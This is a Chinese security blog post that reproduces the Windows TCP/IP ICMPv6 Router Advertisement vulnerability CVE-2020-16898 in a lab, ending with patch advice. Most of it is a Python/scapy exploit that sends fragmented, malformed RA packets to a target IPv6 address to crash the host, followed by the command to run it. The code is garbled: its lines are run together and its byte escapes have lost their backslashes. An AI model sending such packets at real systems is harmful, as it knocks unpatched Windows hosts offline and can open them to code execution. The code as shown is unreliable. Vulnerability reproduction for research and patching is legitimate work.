TCP/IP远程代码执行漏洞(CVE-2020-16898)复现

admin
admin
admin
140350
文章
117
评论
2020年11月14日12:06:52评论332 views字数 1816阅读6分3秒阅读模式

简介


Windows TCP/IP堆栈不正确地处理ICMPv6 Router Advertisement数据包时,存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以获得在目标服务器或客户端上执行代码的能力。要利用此漏洞,攻击者必须将经过特殊设计的ICMPv6 Router Advertisement数据包发送到远程Windows计算机上。

 

漏洞概述


Windows TCP/IP堆栈在处理IMCPv6 Router Advertisement(路由通告)数据包时存在漏洞,远程攻击者通过构造特制的ICMPv6 Router Advertisement(路由通告)数据包,并将其发送到远程Windows主机上,即可在目标主机上执行任意代码


影响版本

 

microsoft:window_server_2019:/1903/1909/2004
microsoft:window_server_2019:*
microsoft:window_server:1903/1909/2004


 

环境搭建


打开虚拟网络编辑器

开启ipv6

TCP/IP远程代码执行漏洞(CVE-2020-16898)复现

安装一个受影响的win10镜像

TCP/IP远程代码执行漏洞(CVE-2020-16898)复现

关闭防火墙

TCP/IP远程代码执行漏洞(CVE-2020-16898)复现

查看ipv6地址

TCP/IP远程代码执行漏洞(CVE-2020-16898)复现

可以ping

TCP/IP远程代码执行漏洞(CVE-2020-16898)复现


漏洞复现


攻击机的ipv6

TCP/IP远程代码执行漏洞(CVE-2020-16898)复现

v6_dst填写目标的ipv6

v6_src填写攻击机的ipv6

TCP/IP远程代码执行漏洞(CVE-2020-16898)复现

Poc

#!/usr/bin/env python3## Proof-of-Concept / BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability## Author: Adam 'pi3' Zabrocki# http://pi3.com.pl#
from scapy.all import *
v6_dst = "fd15:4ba5:5a2b:1008:89e:ba00:7122:2d9"v6_src = "fe80::f81e:2b9a:f1a2:59c0"

p_test_half = 'A'.encode()*8 + b"x18x30" + b"xFFx18"p_test = p_test_half + 'A'.encode()*4
c = ICMPv6NDOptEFA();
e = ICMPv6NDOptRDNSS()e.len = 21e.dns = ["AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA","AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA","AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA","AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA","AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA","AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA","AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA","AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA","AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA","AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]
pkt = ICMPv6ND_RA() / ICMPv6NDOptRDNSS(len=8) /       Raw(load='A'.encode()*16*2 + p_test_half + b"x18xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e
p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/               IPv6ExtHdrFragment()/pkt
l=fragment6(p_test_frag, 200)
for p in l:    send(p)

运行代码

python3 p_CVE-2020-16898.py


TCP/IP远程代码执行漏洞(CVE-2020-16898)复现

TCP/IP远程代码执行漏洞(CVE-2020-16898)复现


修复建议

 

通过如下链接自行寻找符合操作系统版本的漏洞补丁,并进行补丁下载安装。

CVE-2020-16898 | Windows TCP/IP远程执行代码漏洞

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898


 


本文始发于微信公众号(锋刃科技):TCP/IP远程代码执行漏洞(CVE-2020-16898)复现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年11月14日12:06:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   TCP/IP远程代码执行漏洞(CVE-2020-16898)复现https://cn-sec.com/archives/184865.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息